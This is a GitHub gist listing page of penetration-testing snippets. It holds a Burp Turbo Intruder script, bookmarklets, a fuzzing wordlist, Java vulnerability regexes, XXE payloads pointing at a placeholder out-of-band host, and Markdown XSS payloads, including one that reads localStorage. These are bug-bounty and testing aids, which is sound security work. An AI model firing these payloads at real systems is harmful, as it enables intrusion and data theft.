mrrootsec / MutateMethods.py

Created February 15, 2026 04:39 — forked from defparam/MutateMethods.py

Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.

	from threading import Thread
	import time

	class TrafficMagnet(burp.IProxyListener):
	def __init__(self):
	callbacks.registerProxyListener(self)
	self._helpers = callbacks.getHelpers()
	self._callbacks = callbacks

mrrootsec / xxe-payloads.txt

Created February 15, 2026 04:38 — forked from honoki/xxe-payloads.txt

XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

mrrootsec / settings.json

Created February 15, 2026 03:28

Config of Filemarker extension for manual security code review

	{
	"markerTypes": [
	{
	"id": "secure",
	"badge": "🔐",
	"color": "editorHint.foreground",
	"label": "Secure"
	},
	{
	"id": "done",

mrrootsec / Cleaner.py

Created January 27, 2026 08:57

Get rid of junk headers

	# -- coding: utf-8 --
	"""
	Burp Suite Extension (Jython / Python 2.7)

	Adds a Repeater request-editor context menu item that removes "unnecessary"
	browser/client-hint headers:
	- Sec-Fetch-*
	- Sec-CH-* (a.k.a. Sec-Ch-*)

	How it integrates with Burp:

mrrootsec / Hidden Input Params Detect

Created January 27, 2026 06:46

javascript:(function(){const avoidParams=['aspsessionid','asp.net_sessionid','__eventtarget','__eventargument','__viewstate','__eventvalidation','jsessionid','cfid','cftoken','phpsessid','session_id'];const shouldAvoid=(n)=>{const l=n.toLowerCase();return avoidParams.includes(l)||/^aspsessionid.*/.test(l)};const hiddenInputs=document.querySelectorAll('input[type="hidden"]');let params=new URLSearchParams();let extractedParams={};hiddenInputs.forEach(input=>{const name=input.name;const value=input.value||'xxxx';if(!name||shouldAvoid(name))return;params.append(name,value);extractedParams[name]=value});const url=new URL(window.location);params.forEach((value,key)=>{url.searchParams.append(key,value)});const logData={timestamp:'2025-10-24 02:47:10',user:'mosaqlain_deloitte',currentUrl:window.location.href,newUrl:url.toString(),extractedHiddenInputs:extractedParams,totalExtracted:Object.keys(extractedParams).length};console.log('=== HIDDEN INPUT EXTRACTOR LOG ===');console.log('Timestamp (UTC):', logData.timestamp

mrrootsec / fetch2BurpRAW.js

Last active October 24, 2025 04:45

Convert fetch to Burp RAW Request

javascript:(function(){const c='burp_converter_'+Date.now(),d=document.createElement('div');d.id=c;d.innerHTML='<div style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);width:90%;max-width:800px;max-height:90vh;background:#f5f5f5;border:2px solid #333;border-radius:8px;box-shadow:0 4px 20px rgba(0,0,0,0.3);z-index:999999;font-family:\'Courier New\',monospace;overflow:hidden;display:flex;flex-direction:column"><div style="background:#222;color:#fff;padding:12px 16px;font-weight:bold;font-size:14px;display:flex;justify-content:space-between;align-items:center"><span>Fetch to Burp Converter</span><button id="'+c+'_close" style="background:#ff4444;color:white;border:none;padding:4px 8px;border-radius:3px;cursor:pointer;font-weight:bold">×</button></div><div style="flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:16px"><div><label style="display:block;margin-bottom:6px;font-weight:bold;font-size:12px">Input (fetch call, object, or raw HTTP):</label><textarea id="'+c+'_in

mrrootsec / List of API endpoints & objects

Created August 20, 2025 03:39 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

mrrootsec / gist:3c99eecd740983774738950c74ada109

Created July 24, 2025 11:20 — forked from tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc

Markdown XSS Payloads

	Links:

	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')

	Images:

mrrootsec / Json_columns.bambda

Created July 5, 2025 16:45

JSON param key as column name

	name: JSON param key as column name
	function: VIEW_FILTER
	location: PROXY_HTTP_HISTORY
	source: \|+
	/**
	* Extracts a JSON parameter and creates a column named after the parameter.
	* @author mrrootsec
	*/

	var req = requestResponse.request();

mrrootsec / README.md

Created June 29, 2025 11:42 — forked from win3zz/README.md

Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

Generic Passwords / Secrets / Tokens:
- Regex:

MOHAMMAD SAQLAIN mrrootsec

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets